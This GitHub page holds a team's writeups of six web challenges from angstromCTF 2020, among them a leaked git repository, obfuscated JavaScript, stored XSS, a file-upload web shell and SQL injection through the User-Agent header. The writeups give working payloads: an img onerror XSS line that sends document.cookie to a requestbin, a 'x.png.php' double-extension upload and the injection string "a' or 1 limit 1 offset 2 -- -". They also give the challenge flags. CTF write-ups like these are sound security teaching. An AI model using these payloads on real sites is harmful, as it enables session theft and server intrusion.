Skip to content

Latest commit

 

History

History
83 lines (61 loc) · 4.34 KB

angstromCTF 2020.md

File metadata and controls

83 lines (61 loc) · 4.34 KB

angstromCTF 2020

This is our writeups for ångstromCTF 2020.

angstrom-3e0d6c871da7786e59fcc988735f4f5ded75aab5fac89f538291b3ef033801eb

i participated in ångstromCTF 2020 with my awesome team P1rates as python_4004 & my dude mokey . This is our writeups about some challenges we solved during the competition.

Web challenges

Git Good

Noting the name of the challenge, I think the system is based on git management system But I have to make sure first , so i will use dirb tool dirb

now lets try to download git files to do that open your terminal and write git clone +the link of the challenge

Screenshot from 2020-03-21 02-37-29 The first thing I thought about was looking at the log file

git log -p

Screenshot from 2020-03-21 02-41-08 the flag is :

actf{b3_car3ful_wh4t_y0u_s3rve_wi7h}

Consolation

by clicking on pay my some money it call nofret() function so let's see source code
Screenshot from 2020-03-21 03-36-56

okey i found that javascript is obfuscated. so we need to revesre this code ,i use this online platform to decode our obfuscated js file http://www.jsnice.org/

Screenshot from 2020-03-21 03-46-10

looking very well i found ohh lets delete this line and put thit function on console console ["clear"] ();

Screenshot from 2020-03-21 04-02-07

the flag is :

actf{you_would_n0t_beli3ve_your_eyes}

The Magic Word

it was very easy challenge what you should do only open inspect and Change "give flag" to "please give flag" Screenshot from 2020-03-21 04-07-53 the flag is :

actf{1nsp3c7_3l3m3nt_is_y0ur_b3st_fri3nd}

Xmas Still Stands

This was an easy xss stored challenge given the following:

first i post this post <img src=x onerror='requestbin?cookie='+document.cookie> i use requestbin to get admin cookies Screenshot from 2020-03-21 04-26-16

i reported my post to admin , checking my requestbin i found the flag the flag is :

actf{s4n1tize_y0ur_html_4nd_y0ur_h4nds}

Defund's Crypt

Screenshot from 2020-03-21 04-57-04 It’s file upload injection so lets try to upload shell In the form of a picture format i googled and find this good article our extention will be x.png.php this is our shell script using burpsuit :

89855682_714296872437271_6861930706059132928_n

response

89873018_212735623171923_7771926506762141696_n

the flag is:

actf{th3_ch4ll3ng3_h4s_f4ll3n_but_th3_crypt_rem4ins}

Secret Agents

from burpsuit i check user-agent header and try to inject it manually After many attempts, I finally i reach to the flag using this query a' or 1 limit 1 offset 2 -- -

89852223_205522447361583_8420305932386304000_n

the flag is :

actf{nyoom_1_4m_sp33d}